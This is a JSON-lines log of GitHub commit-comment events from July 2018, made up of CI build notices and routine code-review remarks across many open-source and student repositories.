{"id":"7974175473","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29729321,"position":null,"line":null,"path":null,"commit_id":"cf624b9f65bfcb5c6d9d5f8c06f2c84d2c607559","created_at":"2018-07-17T03:45:41Z","updated_at":"2018-07-17T03:45:41Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 544](https://ci.hashicorp.engineering/viewLog.html?buildId=104491&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:36"}},"created_at":"2018-07-17T03:45:41Z"}
{"id":"7974175481","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29729322,"position":null,"line":null,"path":null,"commit_id":"d406755c597e253fdbcced12c46d7639ade471b9","created_at":"2018-07-17T03:45:41Z","updated_at":"2018-07-17T03:45:41Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 545](https://ci.hashicorp.engineering/viewLog.html?buildId=104492&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-17T03:45:41Z"}
{"id":"7974176248","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29729323,"position":null,"line":null,"path":null,"commit_id":"d406755c597e253fdbcced12c46d7639ade471b9","created_at":"2018-07-17T03:45:58Z","updated_at":"2018-07-17T03:45:58Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 545](https://ci.hashicorp.engineering/viewLog.html?buildId=104492&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:17"}},"created_at":"2018-07-17T03:45:58Z"}
{"id":"7974177471","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29729325,"position":16,"line":62,"path":"code/drasil-docLang/Drasil/DocumentLanguage/Definitions.hs","commit_id":"1ac44586e3088e138c4bed83f1f5fa2bf385372b","created_at":"2018-07-17T03:46:28Z","updated_at":"2018-07-17T03:46:28Z","author_association":"COLLABORATOR","body":"Why is there a hardcoded `++ \"LC\"` in there? Also, why are you creating a new `uid` for what is essentially the same general definition chunk + a label?"}},"created_at":"2018-07-17T03:46:28Z"}
{"id":"7974181065","type":"CommitCommentEvent","actor":{"login":"beholdnec"},"repo":{"name":"beholdnec/model-viewer"},"payload":{"comment":{"id":29729330,"position":169,"line":271,"path":"src/zelview/f3dex2.ts","commit_id":"9a614c091e6bf4d8d8e57c91d3257e002b54dfc2","created_at":"2018-07-17T03:47:56Z","updated_at":"2018-07-17T03:47:56Z","author_association":"OWNER","body":"Good catch!"}},"created_at":"2018-07-17T03:47:56Z"}
{"id":"7974181265","type":"CommitCommentEvent","actor":{"login":"yesszus"},"repo":{"name":"e107inc/e107"},"payload":{"comment":{"id":29729331,"position":73,"line":1388,"path":"e107_admin/image.php","commit_id":"bb7f8717fa82fc330659d97034ae6bb0d5edde34","created_at":"2018-07-17T03:48:01Z","updated_at":"2018-07-17T03:48:01Z","author_association":"CONTRIBUTOR","body":"Use this lan code: IMALAN_163 // video."}},"created_at":"2018-07-17T03:48:01Z"}
{"id":"7974187509","type":"CommitCommentEvent","actor":{"login":"ry0id"},"repo":{"name":"ohlookitsAugust/RemBot"},"payload":{"comment":{"id":29729343,"position":null,"line":null,"path":null,"commit_id":"d56528980cc35a3343028d8efd686ddc1bcfb02e","created_at":"2018-07-17T03:50:25Z","updated_at":"2018-07-17T03:50:25Z","author_association":"CONTRIBUTOR","body":"Refactor*"}},"created_at":"2018-07-17T03:50:25Z"}
{"id":"7974188423","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729344,"position":104,"line":601,"path":"compiler/deSugar/DsMeta.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T03:50:48Z","updated_at":"2018-07-17T03:50:48Z","author_association":"OWNER","body":"what if tys is not in that form?"}},"created_at":"2018-07-17T03:50:48Z"}
{"id":"7974188749","type":"CommitCommentEvent","actor":{"login":"BenTheElder"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29729345,"position":null,"line":null,"path":null,"commit_id":"ff407ed6f9cc6cc3767c254eebbc40dfd6ca1a06","created_at":"2018-07-17T03:50:57Z","updated_at":"2018-07-17T03:50:57Z","author_association":"MEMBER","body":"this didn't get removed from the image, and I don't think the kops runner did either...?"}},"created_at":"2018-07-17T03:50:57Z"}
{"id":"7974189160","type":"CommitCommentEvent","actor":{"login":"digama0"},"repo":{"name":"leanprover/mathlib"},"payload":{"comment":{"id":29729346,"position":null,"line":null,"path":null,"commit_id":"ee4ff473d062dd7f9706e51ba63198794f7184b1","created_at":"2018-07-17T03:51:07Z","updated_at":"2018-07-17T03:51:07Z","author_association":"COLLABORATOR","body":"So then what's wrong with running the same lines in stage 2 as in stage 1? grep git status, if found checkout head."}},"created_at":"2018-07-17T03:51:07Z"}
{"id":"7974189571","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29729350,"position":null,"line":null,"path":null,"commit_id":"c96c50007d19e6157b8775155dcb9bfc8f65ad68","created_at":"2018-07-17T03:51:17Z","updated_at":"2018-07-17T03:51:17Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.229`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/229) :tada:"}},"created_at":"2018-07-17T03:51:17Z"}
{"id":"7974191940","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29729353,"position":null,"line":null,"path":null,"commit_id":"c96c50007d19e6157b8775155dcb9bfc8f65ad68","created_at":"2018-07-17T03:52:16Z","updated_at":"2018-07-17T03:52:16Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.347`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/404721586) :tada:"}},"created_at":"2018-07-17T03:52:16Z"}
{"id":"7974192989","type":"CommitCommentEvent","actor":{"login":"oxij"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29729354,"position":null,"line":null,"path":null,"commit_id":"50148f06304ba1dce9130f9476a73fc2d955e10e","created_at":"2018-07-17T03:52:39Z","updated_at":"2018-07-17T03:52:39Z","author_association":"CONTRIBUTOR","body":"> This commits seems to break ```pos``` handling in Nixpkgs.\n\nExample?\n\n> Is it possible to revert this until we can figure out a better way to handle broken packages?\n\nYes, with NixOS/nix#1771 applied this hack is not needed.\n"}},"created_at":"2018-07-17T03:52:39Z"}
{"id":"7974193782","type":"CommitCommentEvent","actor":{"login":"faxiang1230"},"repo":{"name":"openthos/oto_system_vold"},"payload":{"comment":{"id":29729355,"position":null,"line":null,"path":null,"commit_id":"7df20f8c1c12bb78f15a9d9905e5dd5a91c66830","created_at":"2018-07-17T03:52:59Z","updated_at":"2018-07-17T03:52:59Z","author_association":"NONE","body":"When USB storage with multipartition,only identify first partition."}},"created_at":"2018-07-17T03:52:59Z"}
{"id":"7974194161","type":"CommitCommentEvent","actor":{"login":"Afiatus"},"repo":{"name":"Afiatus/projectindividu"},"payload":{"comment":{"id":29729356,"position":null,"line":null,"path":null,"commit_id":"c55e1709b01220e7ebca91126a54b54959dda55b","created_at":"2018-07-17T03:53:08Z","updated_at":"2018-07-17T03:53:08Z","author_association":"OWNER","body":"sewa online"}},"created_at":"2018-07-17T03:53:08Z"}
{"id":"7974195968","type":"CommitCommentEvent","actor":{"login":"BaiShaoqi"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29729358,"position":1206,"line":1206,"path":"src/backend/commands/extension.c","commit_id":"ee8daacb503023f9f756922a74fdd2cf8050a736","created_at":"2018-07-17T03:53:52Z","updated_at":"2018-07-17T03:53:52Z","author_association":"NONE","body":"Recently Asim is wondering the comment is necessary or not\r\nIf not necessary, can it be deleted ?\r\n```\r\n25a90396cd1 (Asim R P           2018-05-18 10:18:11 -0700 1264)         /* GPDB_91_MERGE_FIXME: I don't see any such promotion here. But this is doing\r\n25a90396cd1 (Asim R P           2018-05-18 10:18:11 -0700 1265)          * something else important. Update comment.\r\n```"}},"created_at":"2018-07-17T03:53:52Z"}
{"id":"7974195972","type":"CommitCommentEvent","actor":{"login":"liuhhaiffeng"},"repo":{"name":"liuhhaiffeng/mygitDesktopTest"},"payload":{"comment":{"id":29729359,"position":1,"line":8,"path":"Cplusplus_Gui_Qt4_SourceCode/chap01_lhf/Age/age.cpp","commit_id":"030341ac882becacf6047b3777f5988d107ea9a1","created_at":"2018-07-17T03:53:52Z","updated_at":"2018-07-17T03:53:52Z","author_association":"OWNER","body":"QApplicaiton"}},"created_at":"2018-07-17T03:53:52Z"}
{"id":"7974197893","type":"CommitCommentEvent","actor":{"login":"evaera"},"repo":{"name":"osyrisrblx/t"},"payload":{"comment":{"id":29729361,"position":null,"line":null,"path":null,"commit_id":"e94fdb55de3a729f6e096a33478c3234cf75b6b2","created_at":"2018-07-17T03:54:36Z","updated_at":"2018-07-17T03:54:36Z","author_association":"NONE","body":"ty"}},"created_at":"2018-07-17T03:54:36Z"}
{"id":"7974200704","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29729365,"position":null,"line":null,"path":null,"commit_id":"915dec9f22db9ef7fc4c4ed8d668ef05656348ab","created_at":"2018-07-17T03:55:39Z","updated_at":"2018-07-17T03:55:39Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-17T03:55:39Z"}
{"id":"7974201579","type":"CommitCommentEvent","actor":{"login":"BettyZCJ"},"repo":{"name":"BettyZCJ/springbootMybatis"},"payload":{"comment":{"id":29729367,"position":null,"line":null,"path":null,"commit_id":"8753d23b55674c10f76152f897c43818937ea6f4","created_at":"2018-07-17T03:55:59Z","updated_at":"2018-07-17T03:55:59Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-17T03:55:59Z"}
{"id":"7974201798","type":"CommitCommentEvent","actor":{"login":"krushndayshmookh"},"repo":{"name":"dayshmookh/website-klathrate"},"payload":{"comment":{"id":29729368,"position":null,"line":null,"path":null,"commit_id":"bf2388eda6883939ad571e524a124f8f249348a2","created_at":"2018-07-17T03:56:05Z","updated_at":"2018-07-17T03:56:05Z","author_association":"MEMBER","body":"Please give meaningful titles to commits and commit as functional as possible."}},"created_at":"2018-07-17T03:56:05Z"}
{"id":"7974201902","type":"CommitCommentEvent","actor":{"login":"BettyZCJ"},"repo":{"name":"BettyZCJ/springbootMybatis"},"payload":{"comment":{"id":29729369,"position":null,"line":null,"path":null,"commit_id":"8753d23b55674c10f76152f897c43818937ea6f4","created_at":"2018-07-17T03:56:08Z","updated_at":"2018-07-17T03:56:08Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-17T03:56:08Z"}
{"id":"7974204034","type":"CommitCommentEvent","actor":{"login":"aditya98ak"},"repo":{"name":"aditya98ak/BusTrack"},"payload":{"comment":{"id":29729374,"position":null,"line":null,"path":null,"commit_id":"1585be4854a7dfbe803339926e85a899be7a3f85","created_at":"2018-07-17T03:56:59Z","updated_at":"2018-07-17T03:56:59Z","author_association":"OWNER","body":"Go ahead!\n\nOn Tue, Jul 17, 2018, 9:04 AM alan vikhta <notifications@github.com> wrote:\n\n> sir, i am newbea can i have firebase your app, i'll learn for my essay\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/aditya98ak/BusTrack/commit/1585be4854a7dfbe803339926e85a899be7a3f85#commitcomment-29729269>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUKhgLjr39L_hP37Kuhjt7xR-3Is1j3iks5uHVtAgaJpZM4VSISo>\n> .\n>\n"}},"created_at":"2018-07-17T03:56:59Z"}
{"id":"7974206027","type":"CommitCommentEvent","actor":{"login":"cipher1024"},"repo":{"name":"leanprover/mathlib"},"payload":{"comment":{"id":29729376,"position":null,"line":null,"path":null,"commit_id":"ee4ff473d062dd7f9706e51ba63198794f7184b1","created_at":"2018-07-17T03:57:47Z","updated_at":"2018-07-17T03:57:47Z","author_association":"CONTRIBUTOR","body":"When I submitted that PR I didn't want to do a checkout in stage 2 because\nI thought it would just make Travis work for a long time before telling us\nthat something is wrong.\n\nI now agree with you: let's use the checkout lines in both stage 1 and\nstage 2. Even if it causes the build to start over completely (only rarely,\nI hope) it might succeed in the end and save us the trouble of restarting\nthe build.\n\nSimon\n\n\nOn Mon, Jul 16, 2018 at 11:51 PM Mario Carneiro <notifications@github.com>\nwrote:\n\n> So then what's wrong with running the same lines in stage 2 as in stage 1?\n> grep git status, if found checkout head.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/leanprover/mathlib/commit/ee4ff473d062dd7f9706e51ba63198794f7184b1#commitcomment-29729346>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAEVYArTC4mMO5tSoY4It76NWaKBs76xks5uHV8sgaJpZM4VSIQN>\n> .\n>\n"}},"created_at":"2018-07-17T03:57:47Z"}
{"id":"7974206887","type":"CommitCommentEvent","actor":{"login":"JacksonPlayz"},"repo":{"name":"Phylogeny/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29729378,"position":null,"line":null,"path":null,"commit_id":"2d78af0bb8c9260a9f7be47841fc73e91b9acab0","created_at":"2018-07-17T03:58:06Z","updated_at":"2018-07-17T03:58:06Z","author_association":"NONE","body":"He purposefully removed the backing to save memory because the light switch is never visible unless you place it and break a block behind it."}},"created_at":"2018-07-17T03:58:06Z"}
{"id":"7974207736","type":"CommitCommentEvent","actor":{"login":"Batool-A"},"repo":{"name":"Batool-A/UDACITY"},"payload":{"comment":{"id":29729379,"position":null,"line":null,"path":null,"commit_id":"84a8e5901f12d34cdb73328a33a73437851a7c5f","created_at":"2018-07-17T03:58:27Z","updated_at":"2018-07-17T03:58:27Z","author_association":"OWNER","body":"\r\n[CodeYourOwnQuiz.py.zip](https://github.com/Batool-A/UDACITY/files/2200107/CodeYourOwnQuiz.py.zip)\r\n"}},"created_at":"2018-07-17T03:58:27Z"}
{"id":"7974208223","type":"CommitCommentEvent","actor":{"login":"Batool-A"},"repo":{"name":"Batool-A/UDACITY"},"payload":{"comment":{"id":29729380,"position":null,"line":null,"path":null,"commit_id":"84a8e5901f12d34cdb73328a33a73437851a7c5f","created_at":"2018-07-17T03:58:39Z","updated_at":"2018-07-17T03:58:39Z","author_association":"OWNER","body":"\r\n[movie_website.zip](https://github.com/Batool-A/UDACITY/files/2200109/movie_website.zip)\r\n"}},"created_at":"2018-07-17T03:58:39Z"}
{"id":"7974209029","type":"CommitCommentEvent","actor":{"login":"GaneshSPatil"},"repo":{"name":"gocd/gocd"},"payload":{"comment":{"id":29729383,"position":null,"line":null,"path":null,"commit_id":"b1cdbb141e4ae4eac00f4c5fb1f23f4b462ad5d3","created_at":"2018-07-17T03:58:59Z","updated_at":"2018-07-17T03:58:59Z","author_association":"CONTRIBUTOR","body":"@marques-work -- any specific reason for using agent UUID instead of agent hostname?\r\nI think agent hostname is more readable than agent UUID. \r\nAlso, on the agents' page, only the information of the agent hostname is shown (no information about agent UUID), so it would be better if we show the agent hostname to be in the same context.\r\n\r\nAnd, if its necessary, we can show the agent UUID information somewhere inside the modal."}},"created_at":"2018-07-17T03:58:59Z"}
{"id":"7974210026","type":"CommitCommentEvent","actor":{"login":"BenTheElder"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29729386,"position":54,"line":351,"path":"experiment/generate_tests.py","commit_id":"e9644d4d8560869f636e7418967c824ca7b34829","created_at":"2018-07-17T03:59:22Z","updated_at":"2018-07-17T03:59:22Z","author_association":"MEMBER","body":"you removed this but didn't remove it from the callers :/"}},"created_at":"2018-07-17T03:59:22Z"}
{"id":"7974210848","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729388,"position":79,"line":425,"path":"compiler/hsSyn/Convert.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T03:59:43Z","updated_at":"2018-07-17T03:59:43Z","author_association":"OWNER","body":"change error message to be more specific"}},"created_at":"2018-07-17T03:59:43Z"}
{"id":"7974212295","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729391,"position":107,"line":475,"path":"compiler/hsSyn/Convert.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T04:00:16Z","updated_at":"2018-07-17T04:00:16Z","author_association":"OWNER","body":"more specific error message"}},"created_at":"2018-07-17T04:00:16Z"}
{"id":"7974213999","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729398,"position":201,"line":1357,"path":"compiler/hsSyn/Convert.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T04:00:52Z","updated_at":"2018-07-17T04:00:52Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-17T04:00:52Z"}
{"id":"7974217162","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18003/programming-term2"},"payload":{"comment":{"id":29729404,"position":null,"line":null,"path":null,"commit_id":"05d6fdd8a5dbc1601500f718140eb74ef8fe90fd","created_at":"2018-07-17T04:01:55Z","updated_at":"2018-07-17T04:01:55Z","author_association":"NONE","body":"確認しました。変数を多用せずして九九が出来ているのでOKです。\r\nただ、サンプルの1,2行目、左側の表示がないですね。\r\n\r\nまた、docstringが意味をなしていませんよ。\r\nここにはモジュールやメソッドの役割や引数や戻り値を記載します。\r\nコピペしたかはわかりませんが、コピペする場合には意味を把握してやりましょう。"}},"created_at":"2018-07-17T04:01:55Z"}
{"id":"7974219776","type":"CommitCommentEvent","actor":{"login":"ketan"},"repo":{"name":"gocd/gocd"},"payload":{"comment":{"id":29729411,"position":null,"line":null,"path":null,"commit_id":"b1cdbb141e4ae4eac00f4c5fb1f23f4b462ad5d3","created_at":"2018-07-17T04:02:58Z","updated_at":"2018-07-17T04:02:58Z","author_association":"CONTRIBUTOR","body":"I'd think the hostname cannot possibly be unique. It's possible to have 2 agent processes on the same instance. Although I think it might be useful to have both. `Analytics for agent HOSTNAME with id UUID`.\r\n\r\nThoughts?"}},"created_at":"2018-07-17T04:02:58Z"}
{"id":"7974221443","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729415,"position":278,"line":1410,"path":"compiler/hsSyn/Convert.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T04:03:37Z","updated_at":"2018-07-17T04:03:37Z","author_association":"OWNER","body":"change to | null tys' ->"}},"created_at":"2018-07-17T04:03:37Z"}
{"id":"7974227166","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29729423,"position":null,"line":null,"path":null,"commit_id":"ea39accd59147ad96b3dda75e56e0482f3385ce7","created_at":"2018-07-17T04:05:58Z","updated_at":"2018-07-17T04:05:58Z","author_association":"NONE","body":"結果はOKです。1,2行目は今の状態でもいいですよ。\r\n11行目以降ですが、どういう意味合いで書いていますかね?\r\ndocstringの役割であれば、上に書いておくと良いと思います。(評価には影響しません。)"}},"created_at":"2018-07-17T04:05:58Z"}
{"id":"7974229868","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29729427,"position":18,"line":41,"path":"mipsHex/asm_type/mips_asm_jump.py","commit_id":"0da76ec7238c56c2509e9bba0e42f297b757ae50","created_at":"2018-07-17T04:07:05Z","updated_at":"2018-07-17T04:07:05Z","author_association":"OWNER","body":"I can get a function's argument count by argument register that is stored from mips_asm_jump::__init__() to self.next_result.\r\ne.g) \r\n- la $tp, func1\r\n- jalr $t9\r\n- addiu $a2, aHahaha # \"Hahaha...\"\r\n=> func1's argument count is 3 (a0, a1, a2)"}},"created_at":"2018-07-17T04:07:05Z"}
{"id":"7974231384","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18008/programming-term2"},"payload":{"comment":{"id":29729432,"position":null,"line":null,"path":null,"commit_id":"c57773b988c4440cd4e046c979ffc67b4fd11d4f","created_at":"2018-07-17T04:07:45Z","updated_at":"2018-07-17T04:07:45Z","author_association":"NONE","body":"シンプルなコードで仕様を満たせていますね。\r\nprint()メソッドのendパラメータにて改行を抑止しているのもいいと思います。"}},"created_at":"2018-07-17T04:07:45Z"}
{"id":"7974239835","type":"CommitCommentEvent","actor":{"login":"GaneshSPatil"},"repo":{"name":"gocd/gocd"},"payload":{"comment":{"id":29729440,"position":null,"line":null,"path":null,"commit_id":"b1cdbb141e4ae4eac00f4c5fb1f23f4b462ad5d3","created_at":"2018-07-17T04:11:24Z","updated_at":"2018-07-17T04:11:24Z","author_association":"CONTRIBUTOR","body":"@ketan -- agree that the hostname cannot be unique. But the way we navigate to the agent analytics chart is through agents page. And the possibility of agent confusion due to duplicate hostname lies on the agents' page.\r\nThe title of the agent analytics modal just shows some identifier of the selected agent. Providing UUID on the agent analytics modal title won't solve the confusion and I guess hostname should suffice to show the selected agent information on the title.\r\nBut like I said before, any additional agent information could be shown within the modal body too."}},"created_at":"2018-07-17T04:11:24Z"}
{"id":"7974239922","type":"CommitCommentEvent","actor":{"login":"MilaRioja"},"repo":{"name":"BlockchainLegal/Directory"},"payload":{"comment":{"id":29729442,"position":9,"line":13,"path":"README.md","commit_id":"016173b4b3c7ff9804f1b0848b096086ca1fe8fe","created_at":"2018-07-17T04:11:26Z","updated_at":"2018-07-17T04:11:26Z","author_association":"NONE","body":"| **Name:**  Camila \"Mila\" Rioja | Link https://www.linkedin.com/in/camila-rioja-arantes-384b3970/ | Status Licensed to practice in Brazil \r\n| "}},"created_at":"2018-07-17T04:11:26Z"}
{"id":"7974240380","type":"CommitCommentEvent","actor":{"login":"Timmy17x"},"repo":{"name":"gameflip/gfapi"},"payload":{"comment":{"id":29729443,"position":null,"line":null,"path":null,"commit_id":"9c08686b953f331a4f2bd8d312edb5b94767a2b6","created_at":"2018-07-17T04:11:39Z","updated_at":"2018-07-17T04:11:39Z","author_association":"NONE","body":"Question , I a newb and want to make something to post items that i craft on fortnite easy any suggestions"}},"created_at":"2018-07-17T04:11:39Z"}
{"id":"7974243193","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29729444,"position":null,"line":null,"path":null,"commit_id":"44f95f2b421012b35adbe1a2db7b95cabc96bdae","created_at":"2018-07-17T04:12:55Z","updated_at":"2018-07-17T04:12:55Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/f2c930d9-554e-4fde-84ee-1ee6af6b9e16?project=153942441948"}},"created_at":"2018-07-17T04:12:55Z"}
{"id":"7974243629","type":"CommitCommentEvent","actor":{"login":"kou-ishizaki"},"repo":{"name":"codeforjapan/mapprint"},"payload":{"comment":{"id":29729445,"position":null,"line":null,"path":null,"commit_id":"4c6024900ae177010729e007be417923274c7887","created_at":"2018-07-17T04:13:08Z","updated_at":"2018-07-17T04:13:08Z","author_association":"COLLABORATOR","body":"ローカルver14.5を反映"}},"created_at":"2018-07-17T04:13:08Z"}
{"id":"7974244817","type":"CommitCommentEvent","actor":{"login":"MilaRioja"},"repo":{"name":"BlockchainLegal/Directory"},"payload":{"comment":{"id":29729446,"position":9,"line":13,"path":"README.md","commit_id":"016173b4b3c7ff9804f1b0848b096086ca1fe8fe","created_at":"2018-07-17T04:13:32Z","updated_at":"2018-07-17T04:13:32Z","author_association":"NONE","body":"My name would look good here but I do not seem able to insert. Do I lack permission or github skills?"}},"created_at":"2018-07-17T04:13:32Z"}
{"id":"7974245789","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729448,"position":55,"line":812,"path":"compiler/parser/RdrHsSyn.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T04:13:57Z","updated_at":"2018-07-17T04:13:57Z","author_association":"OWNER","body":"make more specific"}},"created_at":"2018-07-17T04:13:57Z"}
{"id":"7974247023","type":"CommitCommentEvent","actor":{"login":"HackFisher"},"repo":{"name":"artwook/contracts"},"payload":{"comment":{"id":29729450,"position":40,"line":228,"path":"contracts/Crowdsale.sol","commit_id":"4731360c583a026b6cd850d70c1b8d3a9b9763c6","created_at":"2018-07-17T04:14:22Z","updated_at":"2018-07-17T04:14:22Z","author_association":"COLLABORATOR","body":"这边的条件判断可以去掉重复?  下面这样写是否可以?\r\nif (now > steps[currentStep+1].timestamp ){\r\n         currentStep = currentStep + 1;\r\n         emit NextStep(currentStep);\r\n}"}},"created_at":"2018-07-17T04:14:22Z"}
{"id":"7974247887","type":"CommitCommentEvent","actor":{"login":"GoaFan77"},"repo":{"name":"GoaFan77/Enhanced4XModRepo"},"payload":{"comment":{"id":29729453,"position":null,"line":null,"path":null,"commit_id":"6eb5961161a5bf0ee746b7b6ab1d3f832546beff","created_at":"2018-07-17T04:14:45Z","updated_at":"2018-07-17T04:14:45Z","author_association":"OWNER","body":"#7 Rankulus assault nanites can now target other units besides structures."}},"created_at":"2018-07-17T04:14:45Z"}
{"id":"7974248682","type":"CommitCommentEvent","actor":{"login":"HackFisher"},"repo":{"name":"artwook/contracts"},"payload":{"comment":{"id":29729455,"position":1,"line":177,"path":"contracts/Crowdsale.sol","commit_id":"4731360c583a026b6cd850d70c1b8d3a9b9763c6","created_at":"2018-07-17T04:15:06Z","updated_at":"2018-07-17T04:15:06Z","author_association":"COLLABORATOR","body":"上面第169行的testnum可以删掉。"}},"created_at":"2018-07-17T04:15:06Z"}
{"id":"7974250549","type":"CommitCommentEvent","actor":{"login":"HackFisher"},"repo":{"name":"artwook/contracts"},"payload":{"comment":{"id":29729460,"position":26,"line":196,"path":"contracts/Crowdsale.sol","commit_id":"4731360c583a026b6cd850d70c1b8d3a9b9763c6","created_at":"2018-07-17T04:15:54Z","updated_at":"2018-07-17T04:15:54Z","author_association":"COLLABORATOR","body":"minInvestEth  都一样，都是0.01 Ether，我觉得没必要在Step里面存，可以删掉。"}},"created_at":"2018-07-17T04:15:54Z"}
{"id":"7974252375","type":"CommitCommentEvent","actor":{"login":"BenTheElder"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29729463,"position":null,"line":null,"path":null,"commit_id":"ff407ed6f9cc6cc3767c254eebbc40dfd6ca1a06","created_at":"2018-07-17T04:16:39Z","updated_at":"2018-07-17T04:16:39Z","author_association":"MEMBER","body":"fixed in https://github.com/kubernetes/test-infra/pull/8699"}},"created_at":"2018-07-17T04:16:39Z"}
{"id":"7974252733","type":"CommitCommentEvent","actor":{"login":"karl-kauffmann"},"repo":{"name":"Jefkeh/yiimp"},"payload":{"comment":{"id":29729465,"position":null,"line":null,"path":null,"commit_id":"4c86588bfd744ff208d3ed9563572d37a7a20e26","created_at":"2018-07-17T04:16:50Z","updated_at":"2018-07-17T04:16:50Z","author_association":"NONE","body":"You need to leave \r\n`$btcmhd = yaamp_profitability($coin);\r\n$btcmhd = mbitcoinvaluetoa($btcmhd);`\r\notherwise the 'estimate' => $btcmhd, not working and the api show an error.\r\n"}},"created_at":"2018-07-17T04:16:50Z"}
{"id":"7974252739","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729466,"position":39,"line":1716,"path":"compiler/typecheck/TcSplice.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T04:16:50Z","updated_at":"2018-07-17T04:16:50Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-17T04:16:50Z"}
{"id":"7974253147","type":"CommitCommentEvent","actor":{"login":"BenTheElder"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29729467,"position":54,"line":351,"path":"experiment/generate_tests.py","commit_id":"e9644d4d8560869f636e7418967c824ca7b34829","created_at":"2018-07-17T04:17:00Z","updated_at":"2018-07-17T04:17:00Z","author_association":"MEMBER","body":"fix out in https://github.com/kubernetes/test-infra/pull/8699"}},"created_at":"2018-07-17T04:17:00Z"}
{"id":"7974254918","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729474,"position":61,"line":972,"path":"compiler/typecheck/TcHsType.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T04:17:46Z","updated_at":"2018-07-17T04:17:46Z","author_association":"OWNER","body":"more specific"}},"created_at":"2018-07-17T04:17:46Z"}
